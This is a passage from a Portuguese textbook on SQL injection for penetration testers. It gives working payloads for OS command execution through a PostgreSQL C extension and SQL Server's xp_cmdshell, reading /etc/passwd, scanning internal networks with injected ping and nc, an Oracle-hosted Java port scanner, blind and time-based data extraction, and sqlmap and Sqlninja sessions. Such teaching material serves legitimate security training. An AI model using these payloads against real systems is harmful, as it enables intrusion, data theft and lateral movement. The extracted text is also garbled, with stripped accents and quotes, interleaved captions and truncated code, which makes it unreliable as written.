O cdigo que ser usado como exemplo, mostrado parcialmente na Figura 6.44, tambm
obra de Bernardo Guimares e distribudo como software livre, por meio de licena GPL
Lesser General Public License. Essa biblioteca cria quatro funes, que podem ser utilizadas
para a execuo de programas de linha de comando e para a leitura de arquivos. Alm disso,
possvel compil-la para ambientes Windows e Linux, tendo em mente que os cabealhos
e bibliotecas do PostgreSQL precisam estar instalados.
275
...
PG_FUNCTION_INFO_V1(sys_exec);
#ifdef PGDLLIMPORT
extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
#else
extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
#endif
text *argv0 = PG_GETARG_TEXT_P(0);
int32 result = 0;
char *command;
command = text_ptr_to_char_ptr(argv0);
result = system(command);
free(command);
Figura 6.44
PG_FREE_IF_COPY(argv0, 0); Cdigo fonte da
funo sys_exec(),
PG_RETURN_INT32(result); que tem por
objetivo estender o
} PostgreSQL, permi-
tindo execuo de
... programas de linha
de comando.
A gerao do binrio pode ser feita por meio do seguinte comando:
~$ gcc -Wall -I/usr/include/pgsql/server -Os -shared 8
lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
Em seguida, o comando strip deve ser executado, para remoo dos smbolos e conse-
quente reduo do tamanho da biblioteca. O objetivo facilitar o envio para o servidor de
banco de dados, por meio da injeo de SQL (Guimares, 2009).
~$ strip -sx lib_postgresqludf_sys.so
Para enviar o arquivo ao servidor, por se tratar de arquivo binrio, a tcnica baseada em
objetos grandes deve ser empregada. O aluno pode seguir, exatamente, os passos descritos
na seo de manipulao de arquivos e depositar a biblioteca no diretrio /tmp.
Na prxima etapa, as funes devem ser criadas no banco de dados, referenciando a biblio-
teca recm-copiada para o servidor:
276
; 8
CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 8
/tmp/lib_postgresqludf_sys.so, sys_exec LANGUAGE C RETURNS NULL

8
ON NULL INPUT IMMUTABLE; 8
CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 8
/tmp/lib_postgresqludf_sys.so, sys_eval LANGUAGE C RETURNS NULL

8
CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS 8
/tmp/lib_postgresqludf_sys.so, sys_bineval LANGUAGE C RETURNS

NULL 8
CREATE OR REPLACE FUNCTION sys_fileread(text) RETURNS text AS 8
/tmp/lib_postgresqludf_sys.so, sys_fileread LANGUAGE C RETURNS 8
NULL ON NULL INPUT IMMUTABLE;--
Finalizando, o exemplo abaixo ilustra a exibio do arquivo /etc/passwd, por meio de uma
chamada a sys_eval() via injeo de SQL:
Transact-SQL and 1=2 union select 1,null,sys_eval(cat /etc/passwd)--

Consiste em uma
extenso proprietria SQL Server
da linguagem SQL
utilizada pelos SGBDs Funes definidas por usurio so criadas, em SQL Server, por meio do comando CREATE q
SQL Server e Sybase. FUNCTION e podem ser escritas em Transact-SQL ou, a partir da verso 2005, em qual-
quer linguagem baseada no arcabouo .NET, graas integrao com o componente
CLR Common Language Runtime (CLR).
Ambiente de execuo
de cdigo gerenciado, Tambm possvel desenvolver procedimentos estendidos, baseados em linguagens como
provido pelo arcabouo C e C++, por exemplo, e invoc-los, de dentro das funes. Essa funcionalidade, entretanto,
.NET, que traz,
deixar de ser suportada nas verses futuras, em favor da soluo calcada em .NET.
q
como benefcios,
a possibilidade
Essas funes podem ser divididas em duas classes, de acordo com o tipo do valor retornado:
de integrao de
programas escritos em 1 Escalar: devolve um valor de qualquer um dos tipos escalares do SQL Server, exceto
linguagens diversas, o
text, ntext, image e timestamp.
tratamento uniforme
de excees, um 1 Tabela: um conjunto de linhas, compostas por tipos escalares, devolvido. Por esse
modelo simplificado
motivo, essa classe de funo pode ser empregada no lugar de vises, apresentando
de comunicao
entre componentes, a vantagem de ser parametrizada.
mecanismos de
De modo geral, em SQL Server, grande parte do que se deseja fazer, por meio de funes
segurana e controle
de verses. de usurio, j disponibilizada pelo extenso conjunto de procedimentos de sistema.
Se por um lado verdade que a maioria dessas rotinas est desabilitada por padro, desde
a verso 2005, por outro, se a conta de aplicao possui privilgios para criao de funes,
provavelmente, tem tambm o poder para ativar os procedimentos que necessitar.
277
Apesar do argumento acima, para a introduo da sintaxe de CREATE FUNCTION segue um
exemplo de funo de usurio bem simples, que compara dois valores numricos e retorna 1,
0 ou -1, se o primeiro argumento for maior, igual ou menor que o segundo, respectivamente.
CREATE FUNCTION compare(@n1 bigint,
@n2 bigint)
RETURNS int
BEGIN
DECLARE @ret int;
IF @n1 > @n2
SET @ret = 1;
ELSE IF @n1 = @n2
SET @ret = 0;
ELSE
SET @ret = -1;
Figura 6.45
RETURN(@ret); Exemplo de funo
de usurio do
END tipo escalar para
SQL Server.
Execuo de comandos no sistema operacional

Diversos so os objetivos de se executar comandos no sistema operacional, em um teste de q
invaso ou ataque, sendo possvel citar, entre eles: alterao da configurao dos servios
oferecidos e dos mecanismos de proteo instalados, remoo dos rastros deixados por
operaes ilegtimas, extrao de dados para auxiliar a descoberta e explorao de outras
vulnerabilidades, realizao de ataques contra ativos do ambiente e instalao de backdoors. Backdoor
Quais dessas metas podem ser atingidas depende muito dos privilgios da conta, com a Mecanismo instalado
em um sistema,
qual o servidor de banco de dados executado, e da configurao do sistema operacional.
pelo fornecedor ou por
um atacante,
MySQL
q
que permite acesso
direto, de maneira
No h suporte nativo, em MySQL, para a execuo de comandos no sistema operacional.
ilegtima, ao ambiente
Para preencher essa lacuna, necessrio estender a funcionalidade do servidor de banco e informao.
de dados, por meio de funes de usurio, como a apresentada na seo anterior.
Conforme vimos, dependendo da configurao do ambiente e da maneira como a aplicao

foi desenvolvida, o ataque no fcil de ser realizado.
Oracle
H diversos mtodos que podem ser utilizados em Oracle para executar comandos no q
sistema operacional, os quais variam de acordo com a verso empregada. Um problema,
porm, que nenhum deles pode ser usado como expresso, o que, junto com a falta
de suporte a comandos empilhados, inviabiliza a explorao por meio de injeo de SQL
(Clarke, 2009).
278
Para superar essa dificuldade, necessrio encontrar uma rotina em PL/SQL que seja injet-
vel, mas, nesse caso, uma alternativa melhor consiste em aproveitar a vulnerabilidade para
criar e utilizar a funo de usurio, descrita na seo anterior.
PostgreSQL
PostgreSQL, assim como MySQL, no suporta nativamente a execuo de comandos no q
sistema operacional. A soluo para isso, igualmente, consiste na criao de uma funo
de usurio como aquela apresentada na seo anterior.
A grande vantagem do ponto de vista de ataque, em relao ao MySQL, que no h

restries quanto ao diretrio em que a biblioteca gerada deve ser gravada. Isso torna a
explorao nessa plataforma muito mais factvel, desde que a aplicao utilize uma conta
privilegiada para acesso ao SGBD ou que seja possvel escalar privilgios.
SQL Server
Pode-se dizer que o SQL Server, de todos os SGBDs, um dos que mais possuem proce- q
dimentos e funes embutidas para interao com o sistema operacional. Devido aos
diversos ataques que ocorreram, valendo-se dessa grande gama de rotinas, a partir
da verso 2005 boa parte delas passou a vir desativada, por padro, embora nenhuma
tenha sido excluda do pacote.
Se desejado, ainda possvel reativ-las, por meio do procedimento sp_configure, desde

que invocado por uma conta administrativa.
Um desses procedimentos, o xp_cmdshell, permite executar programas arbitrrios, basea-

dos em linha de comando (Anley, 2002a). A sintaxe bem simples, conforme se v a seguir:
exec master..xp_cmdshell <comando>;
Quando usado em um ataque de injeo de SQL, para obter a sada do comando executado
necessrio direcionar a sada para um arquivo e, em seguida, extra-lo do servidor, por
meio da tcnica j discutida. Para melhor entender o mtodo, observe o prximo exemplo,
que visa descobrir as contas existentes no sistema operacional do servidor.
O ataque se inicia com a execuo do comando net1 user, que deve ter a sada enviada a
um arquivo:
; exec master..xp_cmdshell net1 user > c:\temp\net1.txt--
Procede-se criao da tabela temporria, mas de maneira ligeiramente diferente apre-

sentada anteriormente. Para poder recuperar as linhas, na ordem em que aparecem no
arquivo, deve-se incluir uma coluna sequencial na tabela, que utilizada para ordenao
do resultado. Porm, isso faz com que o nmero de colunas do arquivo difira do da tabela,
causando um erro na execuo do BULK INSERT. possvel contornar esse problema por
meio de um descritor de formato, que pode ser gerado pelo utilitrio bcp. Entretanto, se ele
for executado para a tabela final, contendo as duas colunas, o descritor precisa ser editado
para remoo da coluna de ordenao.
Embora seja factvel efetuar todos esses passos, por meio de um ataque de injeo de SQL,
a tarefa bastante rdua. Assim, pode-se recorrer a um truque, em que o arquivo de for-
mato gerado para uma tabela efmera, com apenas uma nica coluna e, depois, empre-
gado para a tabela final, com duas colunas:
279
; create table temp (data varchar(8000)); 8
exec master..xp_cmdshell bcp master..temp format nul -f 8
c:\temp\format.txt -c -T -Usa -P; 8
drop table temp; 8
create table temp (data varchar(8000),id int identity)--
Em seguida, o arquivo importado para a tabela, especificando-se o descritor de formato:
; bulk insert temp from c:\temp\net1.txt with 8
(formatfile=c:\temp\format.txt)--
Por fim, os dados so recuperados e a tabela, removida:
and 1=2 union select id,data,null from temp order by 1; drop 8
table temp--
Varredura de redes
muito comum, em cenrios reais, o SGBD residir em uma rede de servidores segregada q
das demais por meio de um firewall. Enquanto o acesso a partir de outras redes a esse
segmento controlado, dentro dele, normalmente, no h filtragem nenhuma. Nesse
contexto, injeo de SQL apresenta-se como uma ferramenta muito til, pois como o
cdigo injetado processado no SGBD, possvel acessar outros servidores presentes
na mesma sub-rede, sem nenhuma interferncia do firewall instalado.
Uma estratgia que pode ser adotada para a realizao desse teste:
1 Identificao do endereo IP do servidor e da mscara de rede correspondente.
1 Verificar, por meio do comando ping, se h um servidor ativo e responsivo para cada um
dos endereos da mesma rede.
1 Para cada servidor encontrado, testar as portas que desejar, por meio de uma conexo
via telnet, netcat ou mecanismo nativo do SGBD.
Note que, dependendo do tamanho da rede, impraticvel realizar essa tarefa manual-
mente, embora no seja difcil automatiz-la. Alm disso, observe que, no segundo passo, a
falta de resposta ao ping no implica, necessariamente, que no exista um servidor com o
endereo sendo testado; possvel, por motivos de segurana, que ele tenha sido configu-
rado para no responder a esse tipo de pacote.
MySQL
Para executar, em MySQL, a estratgia de varredura apresentada, necessrio utilizar a q
UDF, que permite invocar comandos do sistema operacional.
Os vetores que devem ser injetados nesse processo, a cada passo, decorrem naturalmente
do roteiro de teste.
Inicialmente, o programa ifconfig executado para determinao do IP do servidor:
280
and 1=2 union select null,null,replace(convert(sys_eval(ifconfig) 8
,char(8000)), \n, <BR>),null,null,null#

Figura 6.46
Endereos de rede A partir do resultado da injeo, ilustrado na Figura 6.46, nota-se que o servidor de banco
do servidor MySQL. de dados est conectado s redes 192.168.107.0/24 e 192.168.213.0/24.
Os testes para deteco de outros servidores ativos devem ser realizados nas duas redes:
and 1=2 union select null,null,replace(convert(sys_eval(ping -c 1

Figura 6.47
Resultado da 8 192.168.213.1),char(8000)), \n, <BR>),null,null,null#
injeo, quando
o servidor no Essa injeo pode resultar em servidor no encontrado (Figura 6.47), responsivo (Figura 6.48)
encontrado. e no responsivo.
Figura 6.48 Os seguintes vetores podem ser empregados para verificar que o servidor 192.168.213.100
Resultado da est executando o SGBD Oracle (Figura 6.49) e no disponibiliza acesso via Telnet (Figura 6.50).
injeo, quando
o servidor encon-
trado e responde
ao ping.
281
Oracle:
and 1=2 union select null,null,replace(convert(sys_eval(nc -v -w 2

8 192.168.213.100 1521),char(8000)), \n, <BR>),null,null,null#
Telnet:
Figura 6.49
and 1=2 union select null,null,replace(convert(sys_eval(nc -v -w 2 Oracle detecta-
do no servidor
8 192.168.213.100 23),char(8000)), \n, <BR>),null,null,null# 192.168.213.100.
Oracle Figura 6.50

Resposta vazia,
Em Oracle, para efetuar uma varredura na rede interna, tambm possvel seguir os mesmos indicando que ser-
passos que em MySQL, bastando ajustar os vetores de teste, de acordo com a sintaxe correta. vio Telnet no est
q
disponvel.
Entre as alternativas disponveis esto o uso do pacote UTL_TCP, que permite realizar
conexes TCP, e a criao de uma funo de usurio em Java. Em ambos os casos,
necessrio encontrar uma vulnerabilidade em uma rotina escrita em PL/SQL que
permita realizar a injeo, da mesma maneira que nos exemplos de escalada de privil-
gios e manipulao de arquivos.
Nesse contexto, a Figura 6.51 apresenta um cdigo em Java para varredura de portas em um
nico endereo IP.
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED Scan as
import java.net.Socket;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.lang.StringBuffer;
public class Scan {
public static String portScan(String ip) {
Socket socket = new Socket();

Figura 6.51
StringBuffer sb = new StringBuffer(); Cdigo-fonte Java
de funo que reali-
InetAddress ia = null; za varredura
de portas.
282
try {
ia = InetAddress.getByName(ip); } catch (Exception e)

{
return null;
sb.append(Ports on + ip + :\n);
for (int i = 1; i < 65535; i++) {
try {
socket = new Socket();
socket.connect(new InetSocketAddress(ia, i), 300);
sb.append(Integer.toString(i) + \n);
socket.close();
} catch (Exception e) {
return sb.toString();
Aps executar a injeo do cdigo no banco de dados Oracle, deve-se criar a funo de
usurio correspondente:
EXECUTE IMMEDIATE 8
CREATE OR REPLACE FUNCTION PSCAN (ip IN VARCHAR2) 8
RETURN VARCHAR2 8
AS LANGUAGE JAVA 8
NAME Scan.portScan(java.lang.String) return 8
java.lang.String; 8
;END;;END;--, 8
0,1,0) from dual--
283
E conceder privilgio de execuo para todas as contas do banco:
EXECUTE IMMEDIATE GRANT EXECUTE ON PSCAN TO PUBLIC 8
;END;;END;--, 8
0,1,0) from dual--
Terminado tudo isso, muito fcil efetuar uma varredura de portas em um ativo, utilizando
os recursos do servidor de banco de dados, conforme mostrado na Figura 6.52:
and 1=2 union select 1,null,replace(sys.pscan(192.168.213.100), 8

chr(10),<BR>) from dual--
PostgreSQL Figura 6.52
q
Resultado da
Os endereos IP do servidor PostgreSQL e do cliente conectado, no caso a aplicao, varredura de
podem ser descobertos por meio das funes inet _server_addr () e inet_client_addr(), portas no ativo
192.168.213.100.
respectivamente.
Se o servidor de aplicao estiver instalado junto com o SGBD, o retorno de ambas as funes
um valor nulo. Se no, retorna-se um valor do tipo inet, que pode ser convertido para texto,
empregando-se a funo host(). Um exemplo de como empreg-las em uma injeo de SQL:
union select 1,host(inet_server_addr()),host(inet_client_addr())--
As etapas de identificao de servidores e servios, por sua vez, podem ser cumpridas com
auxlio do mdulo dblink, o mesmo que se usa para testes de fora bruta e dicionrio contra
as contas do banco de dados. A tcnica consiste em tentar conectar-se a um endereo e
porta e observar a mensagem de erro devolvida. Segundo Leidecker (2007), dependendo do

texto, chega-se a uma das concluses abaixo:
1 Servidor inativo: ERROR: could not establish connection DETAIL: could not connect to
server: No route to host Is the server running on host 192.168.213.150 and accepting TCP/IP
connections on port 22?
1 Porta fechada: ERROR: could not establish connection DETAIL: could not connect to server:
Connection refused Is the server running on host 192.168.213.100 and accepting TCP/IP
connections on port 23?
284
1 Porta aberta: ERROR: could not establish connection DETAIL: server closed the connection
unexpectedly This probably means the server terminated abnormally before or while
processing the request.
1 Porta aberta ou filtrada: ERROR: could not establish connection DETAIL: timeout expired.
Logo abaixo, encontra-se um exemplo do que injetar na aplicao para a realizao desses testes:
and 1=2 union select 1,null,dblink_connect(host=192.168.213.100 8
port=1521 connect_timeout=5)--
SQL Server
A descoberta do endereo IP do servidor SQL Server pode ser realizada invocando o q
programa ipconfig, por meio do procedimento estendido xp_cmdshell.
A sada do ipconfig deve ser direcionada para um arquivo, a partir do qual a informao
desejada extrada, empregando-se a tcnica baseada no comando BULK INSERT.
As etapas seguintes, de identificao de servidores e portas abertas, so efetuadas de q

maneira similar ao PostgreSQL. As diferenas residem no uso do comando OPENRO-
WSET, no lugar de dblink_connect(), e nas mensagens de erro geradas, descritas a seguir
(Litchfield et al., 2005):
1 Servidor inativo: [DBNETLIB][ConnectionOpen (Connect()).]SQL Server does not exist

or access denied.
1 Porta fechada: [DBNETLIB][ConnectionOpen (Connect()).]SQL Server does not exist

or access denied.
1 Porta aberta: [DBNETLIB][ConnectionRead (recv()).]General network error. Check

your network documentation.
O vetor de teste abaixo representa um modelo do que deve ser injetado nesse tipo de teste:
; select * from OPENROWSET(SQLOLEDB,uid=sa;pwd=pwd;Network= 8
DBMSSOCN; Address=192.168.213.100,1521;timeout=5,)--
Partio e balanceamento
A tcnica de partio e balanceamento, introduzida por Litchfield (2005), permite injetar q
consultas e expresses SQL, no meio de valores fornecidos aplicao, sem se preo-
cupar com o nmero de aspas e parnteses presentes no comando original.
A primeira parte do mtodo consiste em reescrever o argumento de outra maneira,

dividindo-o em partes, mas sem alterar o valor original. O balanceamento, por sua vez,
aplicvel somente a valores textuais e garante um nmero par de aspas, o que evita erros
sintticos decorrentes da falta de equilbrio desses delimitadores.
importante salientar que expresses escritas desse jeito podem ser injetadas em qual- q
quer ponto de um comando, e essa a principal vantagem dessa tcnica.
Considere os seguintes comandos SELECTS, executados por um SQL Server:
285
select abc
select a + bc
select a + (select ) + bc
select a + (select b) + c
Embora escritos diferentemente, todos eles so equivalentes e geram o mesmo resultado,

abc. Observe como a partio do texto inicial permite a insero de uma subconsulta entre
as duas partes. Alm disso, conforme j discutido, note que o nmero de aspas sempre
par e, portanto, balanceado.
A tcnica tambm pode ser aplicada a valores numricos, como se v nos prximos exem-
plos, que resultam sempre no valor 10:
select 10
select 10 + 0
select 10 + (select 0)
Injeo de SQL s cegas

At agora, vimos diversas tcnicas de injeo de SQL que dependem da exibio do q
resultado da consulta e, tambm, de mensagens de erro verbosas. Mesmo que essas
condies no sejam satisfeitas, se a aplicao constri os comandos SQL, concate-
nando-os com valores no tratados de usurio, ainda possvel explor-la por meio de
uma tcnica chamada de injeo de SQL s cegas (Spett, 2002; Clarke, 2009).
Tcnica bsica
Considere uma aplicao cuja tela inicial pode ser observada na Figura 6.53, que possui
um nico campo de entrada, no qual possvel digitar parte do nome de um autor. Como
resposta a uma requisio, o sistema indica o nmero de artigos encontrados no acervo da
instituio que tenham sido escritos por pessoas cujos nomes contenham o texto informado
pelo usurio. Observe que os ttulos dos artigos no so apresentados pela aplicao como
resultado da pesquisa realizada.
Figura 6.53
Aplicao de exem-
plo para injeo de

SQL s cegas.
Ao digitar uma aspa simples no campo e clicar em Contar artigos, a mensagem genrica q
Erro na execuo da consulta! exibida. Como se sabe, isso um indicativo de que a apli-
cao pode ser vulnervel injeo de SQL. De modo a confirmar o defeito e identificar o
SGBD utilizado, pode-se empregar a tcnica de partio e balanceamento para submeter
vetores especficos de cada sistema de banco de dados.
286
Aquele valor que no resultar em erro fornece as respostas desejadas, pois indica que o
dado foi entendido e processado pelo servidor.
Com isso em mente, os seguintes vetores de teste podem ser utilizados:
1 MySQL: a
1 Oracle: a || bitand(1,1) ||
1 PostgreSQL: a || pg_sleep(5) ||
1 SQL Server: a +
No caso da aplicao de exemplo, somente o vetor de SQL Server injetado com sucesso e,
assim, todas as construes subsequentes devem ser feitas respeitando as especificidades
desse banco de dados.
Prosseguindo com o teste, devem ser submetidas consultas vlidas e observados os q

resultados devolvidos pela aplicao. Para os textos a e abc, obtm-se, respectiva-
mente, as mensagens 2 artigo(s) encontrado(s)! e 0 artigo(s) encontrado(s)!.
A partir disso, razovel concluir que o SELECT construdo pelo sistema tem a forma:
sql = select count(*) from artigos where autor like % + sAutor +

%
De modo que autor like %a% avaliado como verdadeiro, para duas linhas da tabela, q
enquanto que autor like %abc% falso para todas. Tal constatao permite incluir
perguntas booleanas clusula WHERE, de duas maneiras distintas, com base na
primeira expresso:
1 Se adicionarmos and <pergunta booleana> ao final do WHERE, a expresso autor like

%a% and <pergunta booleana> continua sendo avaliada como verdadeira para duas
linhas, se e somente se, <pergunta booleana> for verdadeira. Assim, pelo nmero de
artigos encontrados, possvel inferir a resposta da pergunta realizada.
1 A segunda construo adota a tcnica de partio e balanceamento para incluir a per-

gunta no meio da entrada, por meio de um CASE. Se a resposta for verdadeira, nada
adicionado ao valor a, seno, a cadeia bc inserida. Desse modo, novamente, pelo
nmero informado de artigos, pode-se concluir a resposta da pergunta feita.
a +
a + (case <pergunta> when <verdadeira> then else bc end) +
Comparando as opes, a primeira tem a vantagem de produzir vetores mais curtos,

enquanto a segunda pode ser empregada em qualquer ponto de injeo, sem se preocupar
com aspas e parnteses. De modo geral, se o tamanho do vetor de teste no for um empeci-
lho, a soluo superior a ltima.
Para continuar o exemplo, vamos supor, agora, que se deseja descobrir a conta utilizada
pela aplicao para acessar o banco de dados.
287
O primeiro passo consiste na determinao do comprimento do identificador de usurio, q
que pode ser realizado perguntando se ele tem um tamanho especfico:
a% and len(system_user)=1--
0 artigo(s) encontrado(s)!
A partir do nmero de artigos, sabe-se que a expresso len(system_user=1) foi avaliada

como falsa. O processo deve ser repetido at a obteno de uma resposta positiva:
A ltima pergunta realizada a correta e indica que o tamanho do identificador igual a trs.
Continuando o processo, cada um desses trs caracteres deve, ento, ser comparado q
com os valores aceitos na composio de um nome de conta. A funo substring() deve
ser utilizada, nessa tarefa, para trabalhar os caracteres, de modo individual, enquanto a
funo lower() empregada para que apenas letras minsculas sejam consideradas.
A partir disso, iniciando com a primeira posio, as seguintes perguntas so efetuadas:
a% and substring(lower(system_user),1,1)=a--
a% and substring(lower(system_user),1,1)=b--
a% and substring(lower(system_user),1,1)=c--
a% and substring(lower(system_user),1,1)=d--
a% and substring(lower(system_user),1,1)=e--
Conclui-se, portanto, que o primeiro caractere do identificador de conta a letra e. Ao execu-

tar o mesmo algoritmo, para a segunda e a terceira posies, obtm-se, respectivamente, s e r,
como se v abaixo. Logo, a conta com a qual a aplicao se conecta ao banco de dados esr.
Segunda posio:
...
a% and substring(lower(system_user),2,1)=r--
288
a% and substring(lower(system_user),2,1)=s--
Terceira posio:
...
a% and substring(lower(system_user),3,1)=q--
a% and substring(lower(system_user),3,1)=r--
Uma rpida anlise do desempenho dessa tcnica pode ser feita com base no nmero
total de requisies que foram necessrias para recuperao do nome de conta. No caso,
para a primeira posio foram 5; para a segunda, 19, e, para a terceira, 18, totalizando 42
solicitaes. Supondo que cada caractere possa ser escolhido somente entre as letras do
alfabeto, em mdia devem ser efetuadas 13 requisies. Esse cenrio no ruim, porm,
se o dado for binrio, 256 valores so possveis e, com isso, o nmero mdio de requisies
aumenta para 128. Embora seja possvel paraleliz-las, elas representam um volume grande
de informaes sendo enviadas ao servidor, e, assim, necessrio encontrar uma alterna-
tiva melhor. Visando satisfazer esse objetivo, h duas abordagens que podem ser adotadas:
busca binria e mtodo bit-a-bit (Clarke, 2009).
Busca binria
A busca binria permite identificar o valor de um byte com o total de oito perguntas. q
A ideia bem simples e consiste em dividir o domnio de busca atual em duas metades e
determinar em qual delas o valor se encontra. Isso permite descartar, com uma per-
gunta, metade dos valores que restaram para pesquisa. O procedimento aplicado,
recursivamente, parte que contm o nmero procurado at que sobre uma partio
com um nico elemento.
Por exemplo, considere que o valor X que se deseja descobrir 65, que o cdigo ASCII da
letra A. Considerando que o domnio inicial compreende todos os valores entre 0 e 255, a
pergunta inicial feita com o nmero 127, que ocupa a mediana do intervalo. Todos os pas-
sos do teste podem ser examinados no roteiro abaixo:
1 X > 127? No, logo o nmero pertence ao intervalo [0..127], cuja mediana 63.
1 X > 63? Sim, logo o nmero pertence ao intervalo [64..127], cuja mediana 95.
1 X > 64? Sim, logo o nmero s pode ser 65, pois maior que 64 e menor ou igual a 65.
Para utilizar essa tcnica, com injeo de SQL s cegas, necessrio empregar a funo
ascii(), que devolve o cdigo ASCII do caractere passado como argumento. Considere o
exemplo anterior, usado para descobrir a conta de acesso ao banco de dados.
289
Ao aplicar a ele esse mtodo, o caractere na primeira posio, e (ASCII = 101), identificado
com as seguintes perguntas:
a% and ascii(substring(lower(system_user),1,1))>127--
0 artigo(s) encontrado(s)! /* Falso: intervalo [0..127] */
2 artigo(s) encontrado(s)! /* Verdadeiro: intervalo [64..127] */
2 artigo(s) encontrado(s)! /* Verdadeiro: intervalo [96..127] */
2 artigo(s) encontrado(s)! /* Verdadeiro: X = 101 */
Fica evidente que essa tcnica bem mais eficiente que a anterior, pois requer apenas oito
requisies para recuperao de um byte, contra 128, da outra, no caso mdio. Apesar
disso, a busca binria apresenta uma pequena desvantagem, que a impossibilidade de
paralelizar as requisies, dada a dependncia existente entre elas.
Antes de encerrar este tpico, convm observar que a funo lower() no necessria para
essa tcnica e nem para a bit-a-bit, uma vez que todos os valores possveis de um byte so
considerados. No caso, ela foi mantida apenas para ficar consistente com o exemplo do
mtodo linear, no qual, realmente, o uso dela representa uma vantagem.
Mtodo bit-a-bit
O mtodo bit-a-bit tambm realiza apenas oito requisies para recuperar o valor de um q
byte, porm, tem a vantagem, sobre a busca binria, de poder ser paralelizado.
A tcnica consiste em extrair o valor de cada um dos bits do byte desejado por meio de um
AND bit-a-bit. Lembrando que o AND resulta em 1 somente quando ambos os operandos
forem 1. Para testar o valor do quinto bit do byte X, por exemplo, pode-se verificar a igual-
dade X and 32 = 32. Se, e somente se, ela for verdadeira, o bit testado est ligado.
De modo geral, numerando os bits de 0 a 7, com 0 sendo o menos significativo, o teste q

do k-simo bit de um byte X qualquer feito por meio da comparao X and 2 = 2 .
k k
290
Para ficar mais claro, vamos aplicar o mtodo ao exemplo anterior:
a% and ascii(substring(lower(system_user),1,1))&128=128--
0 artigo(s) encontrado(s)! /* Falso: bit 7 zero */
2 artigo(s) encontrado(s)! /* Verdadeiro: bit 6 um */
A partir das respostas obtidas, possvel escrever a sequncia de bits 01100101, que igual
ao valor decimal 101, conforme esperado.
Inferncia baseada em tempo

Considere o caso em que a injeo de SQL no produz nenhum efeito sobre o contedo q
que exibido em resposta requisio. Por esse motivo, pode parecer, em um primeiro
instante, que no h meios de explor-la, mas isso pode ser realizado de fato a partir de
um canal secundrio. O fundamento por trs disso, para inferncia baseada em tempo,
consiste na gerao de uma pausa no processamento, se e somente se, uma dada con-
dio, que corresponde pergunta que se quer fazer, for satisfeita.
Obviamente, o tempo de parada deve ser perceptvel, de modo a ser possvel discernir entre
os dois estados.
Esse mtodo pode ser usado tanto com a tcnica de busca binria quanto com a bit-a-bit, e,
de modo geral, melhor que os vetores sejam construdos por meio de partio e balan-
ceamento. O motivo disso que, algumas vezes, o ponto de injeo em aplicaes dessa
natureza ocorre em comandos INSERT e, portanto, a pergunta deve ser includa como parte
da expresso sendo injetada, sem comentrio de final de linha. A falta desse cuidado gera
erro sinttico, fazendo com que o teste no seja efetuado com sucesso.
Para exemplificar, considere uma aplicao baseada em PostgreSQL e que o objetivo seja
extrair a conta utilizada para acesso ao banco de dados. Nesse cenrio, os seguintes valores
so injetados para a descoberta do primeiro byte, empregando a tcnica bit-a-bit:
291
a || (case ascii(substr(user,1,1)) & 128 when 128 then pg_sleep(5) 8
else end) ||
else end) || /* Pausa */
else end) ||
else end) ||
else end) ||
else end) ||
Com base nas injees que resultaram em pausa, obtm-se a sequncia de bits 01110000,
cujo valor decimal 112, o qual o cdigo ASCII da letra p. fcil observar, a partir da lista
acima, que a tcnica de partio e balanceamento, realmente, gera vetores mais longos.
Automao
Executar manualmente as tcnicas de injeo de SQL s cegas est longe de ser uma q
tarefa trivial, uma vez que cada requisio devolve, normalmente, apenas 1 bit de
informao. Consequentemente, a extrao de dados teis implica a realizao de vrios
milhares de requisies, no melhor caso.
Felizmente, existem diversas ferramentas que podem auxiliar o analista de segurana

na execuo desses testes. Entre os diversos exemplares esto: Absinthe, SQLBrute,
Sqlninja e sqlmap.
O utilitrio sqlmap, j introduzido, tambm pode ser utilizado em ataques baseados em inje-
o de SQL s cegas. Para isso, nenhuma opo adicional precisa ser selecionada, embora seja
possvel especificar a tcnica que se deseja empregar, por meio da opo --technique=. Um
exemplo de uso, para extrao do nome do banco de dados, est mostrado na Figura 6.54.
292
$ sqlmap.py -u mssqlbi.esr.rnp.br --current-db --forms
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 17:22:44
...
[17:23:56] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Linux Fedora
web application technology: PHP 5.3.6, Apache 2.2.17
back-end DBMS: Microsoft SQL Server 2000
[17:23:56] [INFO] fetching current database
[17:23:56] [INFO] retrieved:
[17:24:01] [WARNING] adjusting time delay to 1 second
master
Figura 6.54
Extrao do nome current database: master
do banco de dados,
usando a ferra-
menta sqlmap, com
tcnica de injeo [*] shutting down at: 17:25:47
de SQL s cegas.
A ferramenta Sqlninja distribuda sob licena GPLv2 e tem por objetivo explorar aplicaes
vulnerveis injeo de SQL, que utilizam o SQL Server como servidor de banco de dados.
Pode ser executada em plataformas Linux, FreeBSD e MacOS X, desde que um interpretador
Perl esteja instalado, alm de alguns mdulos especficos da linguagem. Permite realizar
diversos ataques, incluindo: deteco do SGBD; identificao da conta utilizada pela
aplicao; fora bruta contra a senha da conta sa; escalada de privilgios no SGBD e no
sistema operacional; criao de procedimento xp_cmdshell personalizado, para o caso do
original estar desabilitado; e envio de executveis, entre muitos outros.
Toda a configurao da ferramenta realizada por meio de parmetros definidos no arquivo

sqlninja.conf. Em uma configurao bsica, devem ser especificados, pelo menos, o nome
de domnio da aplicao; a porta para conexo; pgina vulnervel; tipo de requisio HTTP;
parmetros que devem ser enviados; e parmetro injetvel. Nota-se, com isso, que no faz
parte dos objetivos do Sqlninja encontrar as vulnerabilidades, mas explor-las somente.

Alm disso, necessrio um certo grau de conhecimento, sobre testes de invaso, para
utilizar todas as funcionalidades que a ferramenta disponibiliza.
Um exemplo de sesso do Sqlninja, contra uma aplicao vulnervel injeo de SQL s

cegas, pode ser visto na Figura 6.55.
293
~$ sqlninja -m f
Sqlninja rel. 0.2.5
Copyright (C) 2006-2010 icesurfer <r00t@northernfortress.net>
[+] Parsing configuration file................
[+] Port 80. Assuming cleartext
[+] Target is: mssqlbi.esr.rnp.br
What do you want to discover ?
0 - Database version (2000/2005)
1 - Database user
2 - Database user rights
3 - Whether xp_cmdshell is working
4 - Whether mixed or Windows-only authentication is used
5 - Whether SQL Server runs as System
